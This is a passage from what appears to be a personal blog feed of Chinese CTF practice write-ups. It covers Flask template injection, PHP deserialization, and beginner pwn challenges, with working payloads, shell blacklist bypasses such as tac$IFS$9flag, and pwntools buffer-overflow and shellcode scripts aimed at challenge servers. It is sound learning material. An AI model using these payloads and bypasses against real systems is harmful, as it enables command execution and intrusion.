class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://node5.anna.nssctf.cn:23663/?name=&#123;&#123;config.__class__.__init__.__globals__[&#x27;os&#x27;].popen(&#x27;cat flag&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask,render_template,render_template_string,redirect,request,session,abort,send_from_directory <span class="keyword">import</span> os <span class="keyword">import</span> re app = Flask(__name__) @app.route(<span class="string">&quot;/&quot;</span>) <span class="keyword">def</span> <span class="title function_">app_index</span>(): name = request.args.get(<span class="string">&#x27;name&#x27;</span>) blacklist = [] <span class="keyword">if</span> name: <span class="keyword">for</span> no <span class="keyword">in</span> blacklist: <span class="keyword">if</span> no <span class="keyword">in</span> name: <span class="keyword">return</span> <span class="string">&#x27;Hacker&#x27;</span> template = <span class="string">&#x27;&#x27;&#x27;&#123;%% block body %%&#125; &lt;div class=&quot;center-content error&quot;&gt; &lt;h1&gt;WELCOME TO HNCTF&lt;/h1&gt; &lt;a href=&quot;https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#python&quot; id=&quot;test&quot; target=&quot;_blank&quot;&gt;What is server-side template injection?&lt;/a&gt; &lt;h3&gt;%s&lt;/h3&gt; &lt;/div&gt; &#123;%% endblock %%&#125; &#x27;&#x27;&#x27;</span> % (request.args.get(<span class="string">&#x27;name&#x27;</span>)) <span class="keyword">return</span> render_template_string(template) <span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>: app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>) </span><br></pre></td></tr></table></figure><h2 id="SWPUCTF-2021-新生赛-ez-unserialize"><a href="#SWPUCTF-2021-新生赛-ez-unserialize" class="headerlink" title="[SWPUCTF 2021 新生赛]ez_unserialize"></a>[SWPUCTF 2021 新生赛]ez_unserialize</h2><p>扫描得到robots.txt</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241223211246223.png" alt="image-20241223211246223"></p><p>指引去另一个页面：（？看起来是php框架的（问题不大）</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241223211327062.png" alt="image-20241223211327062"></p><p>PHP调用unserialize()时，会触发魔术方法__wakeup()和<strong>__destruct()</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">wllm</span></span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$admin</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$passwd</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;admin =<span class="string">&quot;user&quot;</span>;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;passwd = <span class="string">&quot;123456&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable language_">$this</span>-&gt;admin === <span class="string">&quot;admin&quot;</span> &amp;&amp; <span class="variable language_">$this</span>-&gt;passwd === <span class="string">&quot;ctf&quot;</span>)&#123;</span><br><span class="line">            <span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;admin;</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;passwd;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;Just a bit more!&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$aa</span> = <span class="keyword">new</span> <span class="title function_ invoke__">wllm</span>();</span><br><span class="line"><span class="variable">$aa</span>-&gt;admin = <span class="string">&quot;admin&quot;</span>;</span><br><span class="line"><span class="variable">$aa</span>-&gt;passwd = <span class="string">&quot;ctf&quot;</span>;</span><br><span class="line"><span class="variable">$stus</span> = <span class="title function_ invoke__">serialize</span>(<span class="variable">$aa</span>);</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="variable">$stus</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure><p>得到序列化的结果</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241223211952244.png" alt="image-20241223211952244"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:4:&quot;wllm&quot;:2:&#123;s:5:&quot;admin&quot;;s:5:&quot;admin&quot;;s:6:&quot;passwd&quot;;s:3:&quot;ctf&quot;;&#125;</span><br></pre></td></tr></table></figure><p>将结果传入最后得到flag</p><h5 id="什么是反序列化漏洞"><a href="#什么是反序列化漏洞" class="headerlink" title="什么是反序列化漏洞"></a>什么是反序列化漏洞</h5><p>当程序在进行反序列化时，会自动调用一些函数，例如__wakeup(),__destruct()等函数，但是如果传入函数的参数可以被用户控制的话，用户可以输入一些恶意代码到函数中，从而导致反序列化漏洞。</p><h5 id="PHP魔术方法"><a href="#PHP魔术方法" class="headerlink" title="PHP魔术方法"></a>PHP魔术方法</h5><p>魔术方法是PHP面向对象中特有的特性。它们在特定的情况下被触发，都是以双下划线开头，利用魔术方法可以轻松实现PHP面向对象中重载（Overloading即动态创建类属性和方法）。 问题就出现在重载过程中，执行了相关代码。</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;？要不？学点web？&quot;&gt;&lt;a href=&quot;#？要不？学点web？&quot; class=&quot;headerlink&quot; title=&quot;？要不？学点web？&quot;&gt;&lt;/a&gt;？要不？学点web？&lt;/h1&gt;&lt;p&gt;orz一个队四个人，常常因为没学过web和大家格格不入，这里简单写几个web</summary>
      
    
    
    
    
    <category term="刷题 Web" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/%E5%88%B7%E9%A2%98-Web/"/>
    
  </entry>
  
  <entry>
    <title>网鼎杯2024 初赛 半决赛 wp</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/11/29/wang-ding-bei-2024-chu-sai-ban-jue-sai-wp/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/11/29/wang-ding-bei-2024-chu-sai-ban-jue-sai-wp/</id>
    <published>2024-11-29T13:11:24.898Z</published>
    <updated>2024-12-16T03:44:39.360Z</updated>
    
    <content type="html"><![CDATA[<h1 id="网鼎杯2024-初赛-半决赛-wp"><a href="#网鼎杯2024-初赛-半决赛-wp" class="headerlink" title="网鼎杯2024 初赛 半决赛 wp"></a>网鼎杯2024 初赛 半决赛 wp</h1><p><a href="https://github.com/CTF-Archives/2024-wdb-Semis-CTF">CTF-Archives&#x2F;2024-wdb-Semis-CTF: 第四届 网鼎杯 半决赛 专项技术挑战赛</a></p><p>追踪 ssh 流量得到密码</p><h3 id=""><a href="#" class="headerlink" title=""></a><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/4737b3ee4f987b63357413240a2055d3.png" alt="img"></h3><p>linux 下运行 ser 和 cli 程序。</p><p>输入密码,然后两次回车即可。</p><h3 id="-1"><a href="#-1" class="headerlink" title=""></a><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/314791e4464eb028ae9b91c680f3b0ae.png" alt="img"></h3>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;网鼎杯2024-初赛-半决赛-wp&quot;&gt;&lt;a href=&quot;#网鼎杯2024-初赛-半决赛-wp&quot; class=&quot;headerlink&quot; title=&quot;网鼎杯2024 初赛 半决赛 wp&quot;&gt;&lt;/a&gt;网鼎杯2024 初赛 半决赛 wp&lt;/h1&gt;&lt;p&gt;&lt;a href=&quot;h</summary>
      
    
    
    
    
    <category term="Re" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/Re/"/>
    
  </entry>
  
  <entry>
    <title>🥰pwn入门刷题日记~</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/11/29/zhe-ci-zhen-de-xue-pwn-ba/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/11/29/zhe-ci-zhen-de-xue-pwn-ba/</id>
    <published>2024-11-29T13:01:58.062Z</published>
    <updated>2025-01-03T05:38:12.971Z</updated>
    
    <content type="html"><![CDATA[<h1 id="🥰pwn入门刷题日记"><a href="#🥰pwn入门刷题日记" class="headerlink" title="🥰pwn入门刷题日记~"></a>🥰pwn入门刷题日记~</h1><h2 id="2024-11-29"><a href="#2024-11-29" class="headerlink" title="2024-11-29"></a>2024-11-29</h2><h3 id="SWPUCTF-2021-新生赛-nc签到"><a href="#SWPUCTF-2021-新生赛-nc签到" class="headerlink" title="[SWPUCTF 2021 新生赛]nc签到"></a>[SWPUCTF 2021 新生赛]nc签到</h3><p>题目：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">art = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">   ((  &quot;####@@!!$$    ))</span></span><br><span class="line"><span class="string">       `#####@@!$$`  ))</span></span><br><span class="line"><span class="string">    ((  &#x27;####@!!$:</span></span><br><span class="line"><span class="string">   ((  ,####@!!$:   ))</span></span><br><span class="line"><span class="string">       .###@!!$:</span></span><br><span class="line"><span class="string">       `##@@!$:</span></span><br><span class="line"><span class="string">        `#@!!$</span></span><br><span class="line"><span class="string">  !@#    `#@!$:       @#$</span></span><br><span class="line"><span class="string">   #$     `#@!$:       !@!</span></span><br><span class="line"><span class="string">            &#x27;@!$:</span></span><br><span class="line"><span class="string">        &#x27;`\   &quot;!$: /`&#x27;</span></span><br><span class="line"><span class="string">           &#x27;\  &#x27;!: /&#x27;</span></span><br><span class="line"><span class="string">             &quot;\ : /&quot;</span></span><br><span class="line"><span class="string">  -.&quot;-/\\\-.&quot;//.-&quot;/:`\.&quot;-.JrS&quot;.&quot;-=_\\</span></span><br><span class="line"><span class="string">&quot; -.&quot;-.\\&quot;-.&quot;//.-&quot;.`-.&quot;_\\-.&quot;.-\&quot;.-//&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="built_in">print</span>(art)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;My_shell_ProVersion&quot;</span>)</span><br><span class="line"></span><br><span class="line">blacklist = [<span class="string">&#x27;cat&#x27;</span>,<span class="string">&#x27;ls&#x27;</span>,<span class="string">&#x27; &#x27;</span>,<span class="string">&#x27;cd&#x27;</span>,<span class="string">&#x27;echo&#x27;</span>,<span class="string">&#x27;&lt;&#x27;</span>,<span class="string">&#x27;$&#123;IFS&#125;&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    command = <span class="built_in">input</span>()</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> blacklist:</span><br><span class="line">        <span class="keyword">if</span> i <span class="keyword">in</span> command:</span><br><span class="line">            exit(<span class="number">0</span>)</span><br><span class="line">    os.system(command)</span><br></pre></td></tr></table></figure><p>才知道是黑名单绕过——</p><p>参考文章：<a href="https://g3rling.top/284">NSSCTF——Pwn 刷题笔记 – G3rling’s Blog</a></p><p>一些方法：</p><p>方法一 使用引号截断绕过+$IFS$9(空格)绕过</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">l‘s&#x27;</span><br><span class="line">c&#x27;at&#x27;$IFS$9flag</span><br></pre></td></tr></table></figure><hr><p>方法二 转义符\＋$IFS$9(空格)绕过</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c\at$IFS$9flag</span><br></pre></td></tr></table></figure><hr><p>方法三 tac绕过</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tac$IFS$9flag</span><br></pre></td></tr></table></figure><hr><p>方法四 获取root权限</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">bin/sh</span><br><span class="line">bash</span><br><span class="line">su</span><br><span class="line">sh</span><br><span class="line">$0</span><br></pre></td></tr></table></figure><p>exp：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(“<span class="number">1.14</span><span class="number">.71</span><span class="number">.254</span>”,<span class="number">28612</span>)</span><br><span class="line">p.sendline(“tac$IFS$9flag”)</span><br><span class="line"><span class="built_in">print</span>(p.recv())</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h3 id="SWPUCTF-2021-新生赛-gift-pwn"><a href="#SWPUCTF-2021-新生赛-gift-pwn" class="headerlink" title="[SWPUCTF 2021 新生赛]gift_pwn"></a>[SWPUCTF 2021 新生赛]gift_pwn</h3><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241129192209329.png" alt="image-20241129192209329"></p><p>64位，部分保护</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241129192146235.png" alt="image-20241129192146235"></p><p>要导向<strong>0x4005b6</strong></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241129192256175.png" alt="image-20241129192256175"></p><p>读取16个（看起来空间还是很大的）</p><p>exp：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&#x27;node4.anna.nssctf.cn&#x27;</span>,<span class="number">28520</span>)</span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span>*<span class="number">0x10</span>+<span class="string">b&#x27;B&#x27;</span>*<span class="number">0x8</span>+p64(<span class="number">0x4005b6</span>)</span><br><span class="line">p.send(payload)  <span class="comment">#pwn爹sendline会多加一个换行符</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&#x27;node4.anna.nssctf.cn&#x27;</span>,<span class="number">28520</span>)</span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">shellcode_addr = your_addr</span><br><span class="line">ret = <span class="number">0x4004c3</span>    <span class="comment"># ROPgadget --binary pwn only ”ret|pop“</span></span><br><span class="line">payload = shellcode.ljust(<span class="number">0x10</span>,<span class="string">&#x27;a&#x27;</span>)+shellcode.ljust(<span class="number">0x8</span>,<span class="string">&#x27;b&#x27;</span>)+p64(ret)+p64(shellcode_addr)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive() </span><br></pre></td></tr></table></figure><h3 id="LitCTF-2023-只需要nc一下"><a href="#LitCTF-2023-只需要nc一下" class="headerlink" title="[LitCTF 2023]只需要nc一下~"></a>[LitCTF 2023]只需要nc一下~</h3><p>？env？</p><p>或者：</p><p>echo $FLAG</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"># cat Dockerfile</span><br><span class="line">FROM python:<span class="number">3</span>.<span class="number">11</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">COPY</span> . /app</span><br><span class="line"></span><br><span class="line">ENV FLAG=NSSCTF&#123;<span class="number">123456</span>&#125;</span><br><span class="line"></span><br><span class="line">RUN <span class="built_in">echo</span> $FLAG &gt; /flag.txt</span><br><span class="line"></span><br><span class="line">WORKDIR /app</span><br><span class="line"></span><br><span class="line">EXPOSE <span class="number">5000</span></span><br><span class="line"><span class="built_in">CMD</span> [&quot;python&quot;, &quot;app.py&quot;]</span><br></pre></td></tr></table></figure><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">#cat app.py</span><br><span class="line">import os</span><br><span class="line">import subprocess</span><br><span class="line">import socketserver</span><br><span class="line"></span><br><span class="line">class TerminalHandler(socketserver.StreamRequestHandler):</span><br><span class="line">    def handle(self):</span><br><span class="line">        self.intro()</span><br><span class="line">        while True:</span><br><span class="line"><span class="function">            try:</span></span><br><span class="line"><span class="function">                <span class="title">data</span> = <span class="title">self.rfile.readline</span>().<span class="title">strip</span>()</span></span><br><span class="line"><span class="function">                <span class="title">if</span> <span class="title">not</span> <span class="title">data</span>:</span></span><br><span class="line"><span class="function">                    <span class="title">break</span></span></span><br><span class="line"><span class="function">                <span class="title">result</span> = <span class="title">self.execute_command</span>(<span class="title">data</span>)</span></span><br><span class="line"><span class="function">                <span class="title">self.send_result</span>(<span class="title">result</span>)</span></span><br><span class="line"><span class="function">            <span class="title">except</span> <span class="title">Exception</span> <span class="title">as</span> <span class="title">e</span>:</span></span><br><span class="line"><span class="function">                <span class="title">self.send_error</span>(<span class="title">str</span>(<span class="title">e</span>))</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">    <span class="title">def</span> <span class="title">intro</span>(<span class="title">self</span>):</span></span><br><span class="line"><span class="function">        <span class="title">self.wfile.write</span>(<span class="title">b</span>&quot;<span class="title">Welcome</span> <span class="title">to</span> <span class="title">the</span> <span class="title">virtual</span> <span class="title">terminal</span>!\<span class="title">n</span>&quot;)</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">    <span class="title">def</span> <span class="title">execute_command</span>(<span class="title">self</span>, <span class="title">command</span>):</span></span><br><span class="line"><span class="function">        <span class="title">output</span> = <span class="title">subprocess.check_output</span>(<span class="title">command</span>, <span class="title">shell</span>=<span class="title">True</span>)</span></span><br><span class="line"><span class="function">        <span class="title">return</span> <span class="title">output</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">    <span class="title">def</span> <span class="title">send_result</span>(<span class="title">self</span>, <span class="title">result</span>):</span></span><br><span class="line"><span class="function">        <span class="title">self.wfile.write</span>(<span class="title">result</span>)</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">    <span class="title">def</span> <span class="title">send_error</span>(<span class="title">self</span>, <span class="title">error</span>):</span></span><br><span class="line"><span class="function">        <span class="title">self.wfile.write</span>(<span class="title">b</span>&quot;<span class="title">Error</span>: &quot; + <span class="title">error.encode</span>() + <span class="title">b</span>&quot;\<span class="title">n</span>&quot;)</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"><span class="title">if</span> <span class="title">__name__</span> == &quot;<span class="title">__main__</span>&quot;:</span></span><br><span class="line"><span class="function">    <span class="title">HOST</span>, <span class="title">PORT</span> = &quot;0.0.0.0&quot;, 9999</span></span><br><span class="line"><span class="function">    <span class="title">server</span> = <span class="title">socketserver.ThreadingTCPServer</span>((<span class="title">HOST</span>, <span class="title">PORT</span>), <span class="title">TerminalHandler</span>)</span></span><br><span class="line"><span class="function">    <span class="title">server.serve_forever</span>()</span></span><br><span class="line"><span class="function"></span></span><br></pre></td></tr></table></figure><h3 id="CISCN-2019华北-PWN1"><a href="#CISCN-2019华北-PWN1" class="headerlink" title="[CISCN 2019华北]PWN1"></a>[CISCN 2019华北]PWN1</h3><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241129194410208.png" alt="image-20241129194410208"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241129200944813.png" alt="image-20241129200944813"></p><p>很好的小数pwn</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&#x27;node4.anna.nssctf.cn&#x27;</span>,<span class="number">28123</span>)</span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span>*<span class="number">0x2c</span>+p64(<span class="number">0x41348000</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive() </span><br></pre></td></tr></table></figure><h3 id="NISACTF-2022-ReorPwn"><a href="#NISACTF-2022-ReorPwn" class="headerlink" title="[NISACTF 2022]ReorPwn?"></a>[NISACTF 2022]ReorPwn?</h3><p>刚吐槽第三题对web手太友好了，</p><p>发现这一题真是re</p><p><img src="C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20241129200719416.png" alt="image-20241129200719416"></p><p>倒着输入</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># cat flag</span><br><span class="line">galf tac</span><br></pre></td></tr></table></figure><h3 id="SWPUCTF-2022-新生赛-Does-your-nc-work？"><a href="#SWPUCTF-2022-新生赛-Does-your-nc-work？" class="headerlink" title="[SWPUCTF 2022 新生赛]Does your nc work？"></a>[SWPUCTF 2022 新生赛]Does your nc work？</h3><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241129201210505.png" alt="image-20241129201210505"></p><h3 id="BJDCTF-2020-babystack2-0"><a href="#BJDCTF-2020-babystack2-0" class="headerlink" title="[BJDCTF 2020]babystack2.0"></a>[BJDCTF 2020]babystack2.0</h3><p>很好的题，被pwn✌骂了，因为抄错数字，pwn✌debug了半天。</p><p>很好的逆向困难复现（√（总是卡在奇怪的地方（很好很好</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">backdoor = <span class="number">0x400726</span></span><br><span class="line">ret = <span class="number">0x400599</span></span><br><span class="line">p = remote(<span class="string">&#x27;node4.anna.nssctf.cn&#x27;</span>,<span class="string">&#x27;28859&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">b&quot;name:&quot;</span>,<span class="string">b&#x27;-1&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span>*<span class="number">0x10</span> + <span class="string">b&#x27;B&#x27;</span>*<span class="number">8</span>  + p64(backdoor)</span><br><span class="line">p.sendafter(<span class="string">b&quot;name?&quot;</span>,payload)</span><br><span class="line">p.interactive() </span><br></pre></td></tr></table></figure><h3 id="SWPUCTF-2022-新生赛-FindanotherWay"><a href="#SWPUCTF-2022-新生赛-FindanotherWay" class="headerlink" title="[SWPUCTF 2022 新生赛]FindanotherWay"></a>[SWPUCTF 2022 新生赛]FindanotherWay</h3><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241129222440496.png" alt="image-20241129222440496"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241129222507904.png" alt="image-20241129222507904"></p><h2 id="2022-11-30"><a href="#2022-11-30" class="headerlink" title="2022-11-30"></a>2022-11-30</h2><h3 id="BJDCTF-2020-babystack"><a href="#BJDCTF-2020-babystack" class="headerlink" title="[BJDCTF 2020]babystack"></a>[BJDCTF 2020]babystack</h3><p>？前面那个题的简单版</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = remote(‘node4.anna.nssctf.cn’,<span class="number">28931</span>)</span><br><span class="line">p.sendlineafter(b’Please <span class="built_in">input</span> the length of your name:\n’,b’<span class="number">30</span>’)</span><br><span class="line">Payload = b’a’*(<span class="number">0x10</span> + <span class="number">8</span>) + p64(<span class="number">0x04006EA</span>)</span><br><span class="line">p.sendline(Payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h3 id="HNCTF-2022-Week1-easync"><a href="#HNCTF-2022-Week1-easync" class="headerlink" title="[HNCTF 2022 Week1]easync"></a>[HNCTF 2022 Week1]easync</h3><p>找——</p><p>nssctf{Nc_@nd_g3t5h31L}</p><h3 id="NISACTF-2022-ezstack"><a href="#NISACTF-2022-ezstack" class="headerlink" title="[NISACTF 2022]ezstack"></a>[NISACTF 2022]ezstack</h3><p>？为什么呢</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241130165506583.png" alt="image-20241130165506583"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241130165531141.png" alt="image-20241130165531141"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241130165540458.png" alt="image-20241130165540458"></p><h3 id="HGAME-2023-week1-easyenc"><a href="#HGAME-2023-week1-easyenc" class="headerlink" title="[HGAME 2023 week1]easyenc"></a>[HGAME 2023 week1]easyenc</h3><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241130223903631.png" alt="image-20241130223903631"></p><p>普通逆向。。</p><p>NSSCTF{4ddit1on_is_a_rever5ible_0peration}</p><h2 id="2024-11-31"><a href="#2024-11-31" class="headerlink" title="2024-11-31"></a>2024-11-31</h2><h3 id="NISACTF-2022-shop-pwn"><a href="#NISACTF-2022-shop-pwn" class="headerlink" title="[NISACTF 2022]shop_pwn"></a>[NISACTF 2022]shop_pwn</h3><h3 id=""><a href="#" class="headerlink" title="[???]"></a>[???]</h3><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241201153311366.png" alt="image-20241201153311366"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241201153248602.png" alt="image-20241201153248602"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241201153500412.png" alt="image-20241201153500412"></p><h3 id="2024-12-4"><a href="#2024-12-4" class="headerlink" 